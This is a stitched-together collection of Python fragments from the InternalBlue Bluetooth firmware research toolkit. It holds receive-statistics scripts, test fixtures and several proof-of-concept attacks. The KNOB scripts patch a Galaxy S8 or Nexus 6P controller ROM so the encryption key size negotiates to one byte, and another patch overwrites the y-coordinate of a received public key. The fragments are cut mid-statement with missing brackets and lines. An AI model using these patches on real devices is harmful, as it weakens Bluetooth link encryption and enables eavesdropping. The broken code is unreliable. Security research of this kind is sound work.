
from pwn import *
from internalblue.adbcore import ADBCore
from internalblue.bluezcore import BluezCore
Script that shows receive statistics from LE connections over HCI on the CYW20735B1 evaluation board.
Generated with Nexmon.

internalblue = ADBCore()
    internalblue.interface = internalblue.device_list()[0][
        1]  # just use the first Android device
except IndexError:
    internalblue = BluezCore()
        internalblue.interface = internalblue.device_list()[0][
            1]  # ...or the first local HCI interface
    except IndexError:
            "Adapt the Python script to use an available Broadcom Bluetooth interface."

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

progress_log = log.info("Connected to first target, installing patches...")
#!/usr/bin/env python3

# Jiska Classen

# Get receive statistics on a Samsung Galaxy S8 for BLE connection events
import sys
from argparse import Namespace

from pwnlib.asm import asm

import internalblue.hci as hci
from internalblue.adbcore import ADBCore
from internalblue.cli import InternalBlueCLI
from internalblue.utils.packing import u8, u16

internalblue = ADBCore(serial=True)
device_list = internalblue.device_list()
if len(device_list) == 0:
    internalblue.logger.warn("No HCI devices connected!")
internalblue.interface = device_list[0][1]  # just use the first device
# _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because
# they had to for Bluetooth 5 compliance.
# The base address is 0x5E324, and this will jump into the Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
# RX_DONE_HOOK_ADDRESS = 0x1344D0  # on S8 with Patchlevel May 1 2019 on stock ROM
# RX_DONE_HOOK_ADDRESS = 0x134500  # on S8 with Lineage OS Nightly from August 30 2019
RX_DONE_HOOK_ADDRESS = 0x134514  # on S8 with Patchlevel September 1 2019 on stock ROM
    // action performed if nothing in the list matched...
    // this one does a lmp_not_accepted, works for us to prevent parsing
        // assume we have an lmp error that we can handle ourselves...
        mov  r4, r0
        b    0x3f46c
        .byte 0x%02x //length
        //mac address list        
""" % (len(WHITELIST), ''.join([".byte 0x%02x\n" % x
                                for x in WHITELIST_BYTES]))

internalblue = ADBCore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

progress_log = log.info("Writing ASM snippet for LMP MAC address filter.")
if not internalblue.writeMem(
        address=ASM_LOCATION_LMP_FILTER, data=code, progress_log=progress_log):
from internalblue import Address, hci
from internalblue.adbcore import ADBCore
from internalblue.cli import InternalBlueCLI, auto_int
from internalblue.utils.packing import p16, u16
This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8.

Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob

This PoC is much shorter since it only modifies global variables for key entropy.


internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x530F6)  # connection struct key entropy
internalblue.patchRom(Address(0x530F6), patch)
import internalblue.hci as hci
from internalblue.cmds import auto_int

This is a standalone PoC for the KNOB attack on a Nexus 6P.

Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob

This PoC is much shorter since it only modifies global variables for key entropy.


internalblue = ADBCore(serial=False)  # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

log.info("Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!")

# modify function lm_SendLmpEncryptKeySizeReq
#patch = asm("mov r2, #0x1", vma=0x4BC6E)  # connection struct key entropy
#internalblue.patchRom(0x4BC6E, patch)
# this somehow crashes on the Nexus 6P, but the global variable seems to be sufficient :)
# Jiska Classen, Secure Mobile Networking Lab

from pwn import *
from internalblue.adbcore import ADBCore
This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8.

Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob

This PoC is much shorter since it only modifies global variables for key entropy.


internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x530F6)  # connection struct key entropy
internalblue.patchRom(0x530F6, patch)
    // append buffer with "RAND"
    add  r0, 10  // buffer starts at 10 with data
    ldr  r1, =0x444e4152 // RAND
    str  r1, [r0]
    add  r0, 4   // advance buffer by 4

    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl   0xE418  // bthci_event_AttemptToEnqueueEventToTransport

    pop   {r0-r4, pc}

internalblue = ADBCore(log_level='info', serial=True)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

internalblue.logger.info("installing assembly patches...")

# Install the RNG code in RAM
if not internalblue.writeMem(
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
def test_info_queue():
    dummy = [
        QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268,
                     2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'),
        QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436,
                     2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'),
        QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692,
                     2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'),
        QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760,
                     2123760, 0, 0, 2123884, 2123636,
        QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000,
                     2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'),
        QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076,
                     2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'),
        QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196,
                     2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'),
        QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496,
                     2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'),
        QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504,
                     2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'),
        QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412,
                     2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'),
        QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300,
                     2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'),
        QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400,
                     2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'),
        QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412,
                     2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'),
        QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564,
                     2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'),
        QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644,
                     2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'),
        QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732,
                     2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData')

    trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [
        ADBCore(log_level='info', data_directory=data_directory, replay=True)

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readQueueInformation()

    nose.tools.assert_equal([vars(element) for element in information],
                            [vars(element) for element in dummy])

#!/usr/bin/env python2

# Dennis Mantz
from internalblue import Address
from internalblue.adbcore import ADBCore
from internalblue.utils.pwnlib_wrapper import log, asm
#internalblue = core.InternalBlue()

internalblue = ADBCore()
device_list = internalblue.device_list()
if len(device_list) == 0:
    log.warn("No ADB devices connected!")
internalblue.interface = device_list[0][1]  # just use the first device

PK_SEND_HOOK_ADDRESS = Address(0x030098)
GEN_PRIV_KEY_ADDRESS = Address(0x48eba)
b pk_recv_hook
b pk_send_hook
b gen_priv_key

// overwrite y-coordinate of received PK point
    push {r0-r3,lr}
    strb.w  r0, [r4, 170]
    ldr r0, =0x205614
    mov r1, 6
    mov r2, 0
def test_info_heap_old():
    dummy = [{
        'index': 0,
        'buffer_headers': {
            2194080: 0,
            2193828: 2121160,
            2193864: 2194008,
            2193900: 2194044,
            2193936: 2193864,
            2193972: 2121160,
            2194008: 2193900,
            2194044: 2194080
        'capacity': 8,
        'address': 2121160,
        'next': 2121208,
        'memory_size': 288,
        'waitlist_length': 0,
        'buffer_list': 2193828,
        'memory': 2193828,
        'buffer_size': 32,
        'prev': 2157672,
        'list_length': 7,
        'thread_waitlist': 0
    }, {
        'index': 1,
        'buffer_headers': {
            2194592: 0,
            2194116: 2194184,
            2194184: 2194252,
            2194252: 2194320,
            2194320: 2194388,
            2194388: 2194456,
            2194456: 2194524,
            2194524: 2194592
        'capacity': 8,
        'address': 2121208,
        'next': 2121256,
        'memory_size': 544,
        'waitlist_length': 0,
        'buffer_list': 2194184,
        'memory': 2194116,
        'buffer_size': 64,
        'prev': 2121160,
        'list_length': 7,
        'thread_waitlist': 0
    }, {
        'index': 2,
        'buffer_headers': {
            2196000: 2196268,
            2197072: 0,
            2194660: 2194928,
            2195464: 2195732,
            2196268: 2196536,
            2194928: 2195196,
            2195732: 2196000,
            2196536: 2196804,
            2196804: 2197072,
            2195196: 2195464
        'capacity': 10,
        'address': 2121256,
        'next': 2121352,
        'memory_size': 2680,
        'waitlist_length': 0,
        'buffer_list': 2194660,
        'memory': 2194660,
        'buffer_size': 264,
        'prev': 2121208,
        'list_length': 10,
        'thread_waitlist': 0
    }, {
        'index': 3,
        'buffer_headers': {
            2214480: 2215548,
            2215548: 2216616,
            2216616: 0,
            2213412: 2214480
        'capacity': 4,
        'address': 2121352,
        'next': 2121304,
        'memory_size': 4272,
        'waitlist_length': 0,
        'buffer_list': 2213412,
        'memory': 2213412,
        'buffer_size': 1064,
        'prev': 2121256,
        'list_length': 4,
        'thread_waitlist': 0
    }, {
        'index': 4,
        'buffer_headers': {
            2234124: 0,
            2231932: 2233028,
            2224260: 2225356,
            2219876: 2220972,
            2226452: 2227548,
            2223164: 2224260,
            2228644: 2229740,
            2220972: 2222068,
            2225356: 2226452,
            2230836: 2231932,
            2233028: 2234124,
            2222068: 2223164,
            2227548: 2228644,
            2217684: 2218780,
            2218780: 2219876,
            2229740: 2230836
        'capacity': 16,
        'address': 2121304,
        'next': 2157624,
        'memory_size': 17536,
        'waitlist_length': 0,
        'buffer_list': 2217684,
        'memory': 2217684,
        'buffer_size': 1092,
        'prev': 2121352,
        'list_length': 16,
        'thread_waitlist': 0
    }, {
        'index': 5,
        'buffer_headers': {
            2235264: 2235308,
            2235616: 2235660,
            2235396: 2235440,
            2235528: 2235572,
            2235660: 2235704,
            2235308: 2235352,
            2235440: 2235484,
            2235704: 2235748,
            2235792: 2235836,
            2235220: 2235264,
            2235748: 2235792,
            2235352: 2235396,
            2235572: 2235616,
            2235836: 0,
            2235484: 2235528
        'capacity': 15,
        'address': 2157624,
        'next': 2157672,
        'memory_size': 660,
        'waitlist_length': 0,
        'buffer_list': 2235220,
        'memory': 2235220,
        'buffer_size': 40,
        'prev': 2121304,
        'list_length': 15,
        'thread_waitlist': 0
    }, {
        'index': 6,
        'buffer_headers': {
            2236096: 2236132,
            2236240: 2236276,
            2236132: 2236168,
            2236384: 0,
            2235880: 2235916,
            2236204: 2236240,
            2236348: 2236384,
            2235916: 2235952,
            2235952: 2235988,
            2236168: 2236204,
            2236312: 2236348,
            2235988: 2236024,
            2236024: 2236060,
            2236276: 2236312,
            2236060: 2236096
        'capacity': 15,
        'address': 2157672,
        'next': 2121160,
        'memory_size': 540,
        'waitlist_length': 0,
        'buffer_list': 2235880,
        'memory': 2235880,
        'buffer_size': 32,
        'prev': 2157624,
        'list_length': 15,
        'thread_waitlist': 0

    trace = os.path.join(
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [
        ADBCore(log_level='info', data_directory=data_directory, replay=True)

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readHeapInformation()

    nose.tools.assert_equal(information, dummy)
